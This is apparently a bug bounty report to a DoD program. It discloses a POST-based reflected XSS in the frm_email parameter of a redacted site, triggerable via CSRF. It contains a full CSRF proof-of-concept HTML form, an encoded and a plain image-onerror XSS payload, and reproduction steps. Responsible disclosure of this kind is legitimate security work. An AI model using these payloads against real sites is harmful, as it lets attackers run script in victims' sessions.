POST based RXSS on https://█████ via frm_email parameter

Good Afternoon DoD team, ##Summary: I have discovered that on the following domain https://███████ there is Post-Based reflected XSS vulnerability which i can trigger with CSRF (and Clickjacking) due to unsanitized input inside the frm_email parameter ##Description The vulnerable path is: https://███ ##CSRF html code for you to reproduce: ```javascript <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://███" method="POST"> <input type="hidden" name="action" value="FFEXT&#95;forgotpw" /> <input type="hidden" name="token" value="██████████" /> <input type="hidden" name="frm&#95;email" value="&quot;&gt;&lt;img&#32;src&#32;onerror&#61;alert&#40;document&#46;domain&#41;&gt;" /> <input type="hidden" name="frm&#95;zip5" value="NONE" /> <input type="hidden" name="cmd&#95;submit" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ##Steps To Reproduce (As an attacker): 1. Navigate to https://███████ 2. Enter arbitrary text on the email field and NONE on the zip field 3. Capture the request on burp, change the payload on the email field to "><img src onerror=alert(document.domain)> 4. Craft a CSRF PoC and an alert will pop upon clicking. :-) ████████ ##PoC Video: ████ ##Best Regards, nagli ## Impact Attacker can execute JS code on the Victim Behalf.